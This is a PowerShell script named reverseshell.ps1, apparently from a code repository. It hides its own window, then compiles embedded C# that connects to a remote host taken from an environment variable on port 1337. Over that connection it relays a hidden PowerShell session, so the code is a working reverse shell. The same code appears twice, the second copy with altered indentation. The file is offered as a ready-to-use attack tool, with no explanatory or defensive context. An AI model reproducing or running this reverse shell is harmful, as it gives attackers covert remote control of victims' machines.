postworthy/reverseshell.ps1

## reverseshell.ps1
$t = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);'
add-type -name win -member $t -namespace native
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0)

$code = @"
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;

namespace ConnectBack
{
	public class Program
	{
		static StreamWriter streamWriter;

		public static void Main(string[] args)
		{
			using(TcpClient client = new TcpClient("$env:rip", 1337))
			{
				using(Stream stream = client.GetStream())
				{
					using(StreamReader rdr = new StreamReader(stream))
					{
						streamWriter = new StreamWriter(stream);

						StringBuilder strInput = new StringBuilder();

						Process p = new Process();
						p.StartInfo.FileName = "powershell.exe";
						p.StartInfo.CreateNoWindow = true;
						p.StartInfo.UseShellExecute = false;
						p.StartInfo.RedirectStandardOutput = true;
						p.StartInfo.RedirectStandardInput = true;
						p.StartInfo.RedirectStandardError = true;
						p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
						p.Start();
						p.BeginOutputReadLine();

						while(client.Connected && !rdr.EndOfStream)
						{
							strInput.Append(rdr.ReadLine());
							p.StandardInput.WriteLine(strInput);
							strInput.Remove(0, strInput.Length);
						}
					}
				}
			}
		}

		private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
        {
            if (!String.IsNullOrEmpty(outLine.Data))
            {
                try
                {
                    if(outLine.Data.StartsWith("PS ") && outLine.Data.Trim().EndsWith(">")) streamWriter.Write(outLine.Data);
                    else streamWriter.WriteLine(outLine.Data);
                    streamWriter.Flush();
                }
                catch { }
            }
        }
	}
}
"@
$add = Add-Type -TypeDefinition $code -Language CSharp -PassThru
[ConnectBack.Program]::Main($null)
	$t = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);'
	add-type -name win -member $t -namespace native
	[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() \| Get-Process).MainWindowHandle, 0)

	$code = @"
	using System;
	using System.Text;
	using System.IO;
	using System.Diagnostics;
	using System.ComponentModel;
	using System.Net;
	using System.Net.Sockets;

	namespace ConnectBack
	{
	public class Program
	{
	static StreamWriter streamWriter;

	public static void Main(string[] args)
	{
	using(TcpClient client = new TcpClient("$env:rip", 1337))
	{
	using(Stream stream = client.GetStream())
	{
	using(StreamReader rdr = new StreamReader(stream))
	{
	streamWriter = new StreamWriter(stream);

	StringBuilder strInput = new StringBuilder();

	Process p = new Process();
	p.StartInfo.FileName = "powershell.exe";
	p.StartInfo.CreateNoWindow = true;
	p.StartInfo.UseShellExecute = false;
	p.StartInfo.RedirectStandardOutput = true;
	p.StartInfo.RedirectStandardInput = true;
	p.StartInfo.RedirectStandardError = true;
	p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
	p.Start();
	p.BeginOutputReadLine();

	while(client.Connected && !rdr.EndOfStream)
	{
	strInput.Append(rdr.ReadLine());
	p.StandardInput.WriteLine(strInput);
	strInput.Remove(0, strInput.Length);
	}
	}
	}
	}
	}

	private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
	{
	if (!String.IsNullOrEmpty(outLine.Data))
	{
	try
	{
	if(outLine.Data.StartsWith("PS ") && outLine.Data.Trim().EndsWith(">")) streamWriter.Write(outLine.Data);
	else streamWriter.WriteLine(outLine.Data);
	streamWriter.Flush();
	}
	catch { }
	}
	}
	}
	}
	"@
	$add = Add-Type -TypeDefinition $code -Language CSharp -PassThru
	[ConnectBack.Program]::Main($null)